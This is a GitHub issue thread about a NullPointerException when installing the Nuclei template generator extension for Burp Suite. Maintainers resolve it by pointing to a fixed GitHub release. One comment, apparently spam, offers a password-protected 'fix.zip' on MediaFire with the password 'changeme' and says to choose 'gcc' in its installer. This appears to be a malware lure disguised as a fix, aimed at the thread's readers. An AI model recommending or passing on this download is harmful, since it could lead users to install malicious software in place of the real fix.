### ISSUE TITLE
Error Encountered While Installing Burp Suite Nuclei Templates Generators Extension

### ISSUE THREAD

**Issue by Jeetu-study** [projectdiscovery/nuclei-burp-plugin#115]
Hi Team,

I am facing an issue while installing the Burp Suite Nuclei Templates Generators extension. The error log is as follows:

java.lang.NullPointerException: Cannot invoke "java.util.Map.entrySet()" because "definitions" is null
    at io.projectdiscovery.nuclei.util.SchemaUtils.retrieveYamlFieldWithDescriptions(SchemaUtils.java:127)
    at io.projectdiscovery.nuclei.util.SchemaUtils.yamlFieldDescriptionTransformer(SchemaUtils.java:108)
    at io.projectdiscovery.nuclei.util.SchemaUtils.retrieveYamlFieldWithDescriptions(SchemaUtils.java:61)
    at burp.BurpExtender.initializeNucleiYamlSchema(BurpExtender.java:81)
    at burp.BurpExtender.registerExtenderCallbacks(BurpExtender.java:71)
    at burp.Zk_v.Zr(Unknown Source)
    at burp.Zgc0.ZM(Unknown Source)
    at burp.Zgct.lambda$initialiseOnNewThread$0(Unknown Source)
    at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:572)
    at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317)
    at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
    at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
    at java.base/java.lang.Thread.run(Thread.java:1583)
    
    
I have tried installing the extension on different systems, but the issue persists. I have also attached a screenshot of the error for your reference.
Could you please help resolve this issue so that I can successfully install and use this extension?

<img width="816" alt="image" src="https://github.com/user-attachments/assets/9a3d4324-94a5-4ac1-aa04-2d27d7ca9747">

<img width="831" alt="image" src="https://github.com/user-attachments/assets/e8e1a4a0-f76b-4a71-8f2d-b43eb41041a0">

Thanks

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by forgedhallpass** [comment]
Hello @Jeetu-study,

This issue has been solved in https://github.com/projectdiscovery/nuclei-burp-plugin/commit/b12a2da778eeddbd8d39bfe5755c7cc7ab2d9fdd, but indeed the BAppStore version of the plugin has not been updated. Until that happens please use the latest release from GitHub. See https://github.com/projectdiscovery/nuclei-burp-plugin/releases/tag/v1.1.3

**Comment by Jeetu-study** [comment]
> Hello @Jeetu-study,
> 
> This issue has been solved in [b12a2da](https://github.com/projectdiscovery/nuclei-burp-plugin/commit/b12a2da778eeddbd8d39bfe5755c7cc7ab2d9fdd), but indeed the BAppStore version of the plugin has not been updated. Until that happens please use the latest release from GitHub. See https://github.com/projectdiscovery/nuclei-burp-plugin/releases/tag/v1.1.3

Yeah Now its working fine ! Thanks buddy .  👍

**Comment by dogancanbakir** [comment]
As @forgedhallpass pointed out, this is fixed and will be available in BAppStore once https://github.com/PortSwigger/nuclei-template-generator/pull/2 is merged. Closing this.

Thanks for raising the PR @forgedhallpass !
